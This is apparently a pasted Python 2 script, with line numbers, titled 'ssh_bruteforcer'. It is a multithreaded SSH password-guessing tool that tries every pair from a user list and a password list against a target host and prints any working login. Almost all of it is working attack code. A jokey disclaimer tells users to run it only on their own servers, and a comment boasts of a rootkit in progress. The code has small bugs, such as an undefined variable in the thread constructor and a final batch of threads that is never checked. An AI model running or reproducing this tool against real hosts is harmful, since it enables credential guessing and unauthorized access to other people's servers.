[python]_ssh_bruteforcer

1. #!/usr/bin/env python
2. #############################################################
3. # _____ _ #
4. # / ____| | | #
5. # | | ___ _ __ ___ _ __ ___ __ _ _ __ __| |___ #
6. # | | / _ \| |_ | _ \| |_ | _ \ / _| | |_ \ / _| / __| #
7. # | |___| (_) | | | | | | | | | | | (_| | | | | (_| \__ \ #
8. # \_____\___/|_| |_| |_|_| |_| |_|\__|_|_| |_|\____|___/ #
9. # #
10. #############################################################
11. # Simply execute normally as a python file. :)
12. # python sshbrute.py
13. # A command menu will be given.
14. # Please use the -v [verbose] so you will know what password/user it's bruteforcing with
15. # Have fun bbruteforcing your OWN servers :)
16. # Sincerely -Chris Poole | @codingplanets
17. #########################################
18. import sys, time
19. from threading import Thread
20.  
21. try:
22. from paramiko import SSHClient
23. from paramiko import AutoAddPolicy
24. except ImportError:
25. print '''
26. You need paramiko module.
27. Much love from Chris! <3 ^_^
28. aptitude install python-paramiko
29. apt-get install python-paramiko
30. yum install python-paramiko\n'''
31. sys.exit(1)
32.  
33.  
34. def license():
35. '''Print the usage license to this software, yeah, it's the same as above'''
36. print '''
37. If you're here you must love my work by now! ;3
38. I'm still on the verge of creating the rootkit I've
39. been pushing for! ^_^ I love everyone<3 you must love
40. me also!
41. '''
42.  
43.  
44. class BruteForce(Thread):
45. def __init__(self, username, password, target, port, timeout):
46. super(BruteForce, self).__init__()
47.  
48. self.__port = port
49. self.target = target
50. self.password = password
51. self.user = user
52. self.timeout = timeout
53. self.status = 'unknown'
54.  
55.  
56. def run(self):
57. ssh = SSHClient()
58. ssh.set_missing_host_key_policy(AutoAddPolicy())
59. try:
60. ssh.connect(self.target, port = self.__port, username = self.user, password = self.password, pkey=None, timeout = self.timeout, allow_agent=False, look_for_keys=False)
61. self.status = 'ok'
62. ssh.close()
63. except Exception, e:
64. self.status = 'error'
65. pass
66.  
67.  
68. def makelist(file):
69. items = []
70.  
71. try:
72. fd = open(file, 'r')
73. except IOError:
74. print 'unable to read file \'%s\'' % file
75. pass
76.  
77. except Exception, e:
78. print 'unknown error'
79. pass
80.  
81. for line in fd.readlines():
82. item = line.replace('\n', '').replace('\r', '')
83. items.append(item)
84.  
85. return items
86.  
87.  
88. if __name__ == '__main__':
89. from optparse import OptionError
90. from optparse import OptionParser
91.  
92.  
93. version = '''The version is...
94. 1337!!!! you should have knew that!'''
95.  
96. usage = '%s [-H target] [-p port] [-U userslist] [-P wordlist] [-T threads] [-w timeout] [-v]' % sys.argv[0]
97.  
98. print "Usage: %s -H 127.0.0.1 -p 22 -U user.txt -P list.txt -T 16 -w 30 -v" % sys.argv[0]
99. print " "
100.  
101.  
102. parser = OptionParser(version=version, usage=usage)
103.  
104. parser.add_option('-H', dest='target', help='hostname/ip')
105. parser.add_option('-p', type='int', dest='port', default=22, help='port (default:%default)')
106. parser.add_option('-U', dest='userlist', help='userlist file')
107. parser.add_option('-P', dest='passlist', help='passwordlist file')
108. parser.add_option('-T', type='int', dest='threads', default=16, help='number of connections in parallel (%default threads)')
109. parser.add_option('-w', type='int', dest='timeout', default=30, help='defines the max wait time in seconds for responses (%default secs)')
110. parser.add_option('-v', '--verbose', action='store_true', dest='verbose', help='verbose')
111. parser.add_option('-l', '--license', action='store_true', dest='license', help='license')
112.  
113. (options, args) = parser.parse_args()
114.  
115. if options.license:
116. license()
117. sys.exit(0)
118.  
119. if not options.target or not options.userlist or not options.passlist:
120. parser.print_help()
121. sys.exit(1)
122.  
123. target = options.target
124. port = options.port
125. users = options.userlist
126. passwords = options.passlist
127. threads = options.threads
128. timeout = options.timeout
129.  
130. results = []
131. tcounter = 0
132.  
133. userlist = makelist(users)
134. passwordlist = makelist(passwords)
135.  
136. print "[!] SSH-Brute | Created by Chris Poole [!]"
137. print "[*] %s user(s) loaded." % str(len(userlist))
138. print "[*] %s password(s) loaded." % str(len(passwordlist))
139. print "[*] Brute Force started."
140.  
141. for user in userlist:
142. for password in passwordlist:
143. current = BruteForce(user, password, target, port, timeout)
144. results.append(current)
145. current.start()
146. tcounter += 1
147. if options.verbose:
148. print " [+] user: %s" % user + " password: %s\n" % password,
149. if tcounter == threads:
150. for result in results:
151. result.join()
152. if result.status == 'error':
153. pass
154. else:
155. print "\n[*] Login successful!"
156. print "[*] user: %s" % result.user
157. print "[*] password: %s\n" % result.password
158. sys.exit(0)
159. tcounter = 0
160.  
161. print "[*] Thank you for using SSH-Brute! Credits | Chris Poole | @codingplanets\n"
162. sys.exit(0)